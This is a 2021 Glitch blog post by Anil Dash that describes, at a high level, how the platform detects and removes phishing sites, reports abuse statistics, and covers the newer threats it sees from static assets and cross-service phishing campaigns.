By Anil Dash

November 19, 2021

How we keep Glitch sites secure and trusted

Over the years, we’ve done a lot of work to make sure apps and sites that are published on Glitch are trustworthy. That’s our responsibility as a platform, but it’s also good for our community, as it means your apps will be part of a healthy, trustworthy ecosystem. It’s been a while since we’ve shared details of this work, so we wanted to share a high-level overview of how we think about the challenge. We've got some wins to celebrate, some lessons learned, and a clear sense of where our future challenges lie.

**TL;DR: **Glitch intentionally makes app creation as easy and open as possible, which means opening up to more potential misuses of the platform, including phishing sites. By working with a community of security researchers and our own user community, we've been able to significantly improve both our response time and our proactive action on removing potentially harmful contents over the last year. Today, less than one half of one percent of new apps created on Glitch are flagged as being potentially harmful, with that statistic going down over time. And the mean time-to-resolution for reports of potential risk continues to improve, along with faster and more comprehensive suspension and blocking of users that create potentially harmful sites. We expect future challenges to come from phishing attempts that are built across multiple sites, and will be working with the other platforms in the ecosystem to address those threats as they arise.

Reducing Barriers #

First, let’s consider what problem we’re trying to solve. Glitch is designed to make it as easy as possible to create full-stack websites without any barriers. In any system, reducing barriers to creation means it’s easier for bad actors to abuse those systems to make malicious creations. In our particular case, Glitch allows for creating web pages or apps without even logging in, so reducing potential abuse is even trickier than platforms that rely on traditional authentication or login.

The next question that arises is what kind of untrustworthy content could be created on Glitch? The primary concern here is the creation of phishing sites that are designed to capture users’ credentials or personal information. We’ve used a series of layered approaches to counter this risk over the years, with each building on the prior efforts. (This is a high-level overview so our community knows our philosophy on handling the problem, not as an exhaustive technical review of all the efforts we’ve taken.)

But specific to issues around malicious content on Glitch, we’ve found that, from a sampling of 50,000 projects created during November 2021, fewer than 0.3% were flagged as potentially harmful content by either our systems or the reports generated by our partners. We’re working to improve this further, but consider it a good sign of progress in addressing the issue.

With any security or trust domain, having success in one area always results in the battleground shifting a bit to new areas. For example, while we initially focused on malicious full-stack apps being the biggest area of concern on Glitch, what we’ve found with more recent reports is that bad actors are increasingly using static resources (sometimes static HTML, sometimes other document formats like PDF) to try to capture credentials, often with the actual submission of content pointing to other, larger providers like the giant cloud hosting platforms. These static resources are typically served as assets on Glitch, not as part of the core app hosting platform, so they send different signals from full-stack apps that might be potentially harmful.

We’ve worked with our partners to update our monitoring to accommodate these new vectors of attack, and initial results are promising, but what we take away from this learning is that we’ll increasingly see sophisticated attempts that go across multiple services, with Glitch (or part of Glitch’s infrastructure) just being an intermediary in a larger, networked effort. One recent such set of attempts was documented by DomainTools, which looked at these phishing attempts in depth, revealing both their attempted targets (businesses with employees working in the Middle East) as well as their intended mechanism of capturing data (compromised WordPress sites forwarding to an Outlook email address) that show the complexity of tracking these efforts across multiple services. While these patterns are well-established in the general web hosting industry, they're relatively new to Glitch as a community, and represent novel iterations on the pattern that will take time to fully prevent. We expect to have some advantages in this work over time by relying on the social aspects of our platform to help us better distinguish the small number of malicious actors on the platform from the millions of legitimate users.

Overall, we’ve been grateful for the support of our community, including both our users who report potentially harmful apps, as well as the security researchers who provide infrastructure for proactively stopping bad actors. Over time, we’ve gotten better and better at reducing the amount of potential risk on Glitch, both in the absolute and as a percentage of what gets created on the platform every day. We are firmly committed to keeping creation and remixing on Glitch as open and accessible as possible, which means we’re also committed to being responsible for stopping the inevitable misuses that come along with that openness. And we’re glad to do it, because it means that Glitch gets to keep being a great, trusted place for you to make the most creative, interesting, innovative, and useful stuff on the web.